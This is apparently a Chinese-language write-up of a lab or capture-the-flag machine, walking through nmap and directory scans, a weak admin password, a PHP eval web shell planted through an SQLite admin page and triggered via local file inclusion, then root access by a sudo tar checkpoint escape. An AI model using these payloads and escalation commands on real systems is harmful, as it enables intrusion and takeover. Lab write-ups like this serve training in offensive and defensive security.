一、信息收集

1、主机发现

arp-scan -l

2、端口扫描

nmap -sS -sV 192.168.66.144 nmap -p- -Pn -sC -sV -n 192.168.66.144 whatweb -v 192.168.66.144

这里开放了3个端口，先80端口拿去目录，然后测试下22端口有没有什么未授权之类的，然后111端口这个服务去查询一下是什么情况。还有一个55113端口的tcp

22/tcp    open  ssh     OpenSSH 5.9p1 
80/tcp    open  http    Apache httpd 2.2.22 ((Ubuntu))

111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          40121/udp6  status
|   100024  1          41218/tcp6  status
|   100024  1          52754/udp   status
|_  100024  1          55113/tcp   status
55113/tcp open  status  1 (RPC #100024)

3、目录扫描

dirsearch -u http://192.168.66.144:80/ -e * -i 200 dirb http://192.168.66.144

访问一下目录

4、外网打点

Ⅰ、80端口

访问了一个adbadmin页面，看着像缓冲区溢出，在看其他,这里还是爆破一下吧，然后只能看看其他端口了

这里弱口令密码是admin，进来看到这样一个管理员后台，然后我们找一下历史漏洞。

这里有一个远程命令执行，我们看看是什么情况。

其实我后面的都做偏了，这里有账号密码的，但我不熟悉这个东西，md5解密后ssh也无法连接到

Ⅱ、LFI+数据库漏洞

CREATE TABLE 'a' ('data' TEXT default '<?php @eval($_POST[1]);?>')

这里可以看到存储的地址

不过这里不能直接访问

结合这里有个LFI漏洞，估计是结合这个去拿shell 首先登陆SqliteAdmin创建数据库test.php

若在sqliteadmin没有test.php,则此时会在当前目录下生成test.php

这里我们创建一个表格
CREATE TABLE 'test1'('s');

插入一句话木马
INSERT INTO "test1" ("s") VALUES ("'<?php @eval($_POST[1]);?>'")

结合之前的LFI漏洞去访问执行

访问该php文件

这样蚁剑就连接成功了

这里可以看到账号密码，尝试连接一下

Ⅲ、拿shell

这里拿账号密码登录就可以了

这里有两个sudo权限执行文件，去看看有什么提权方法

Ⅳ、提权

提权成功 sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec="/bin/bash"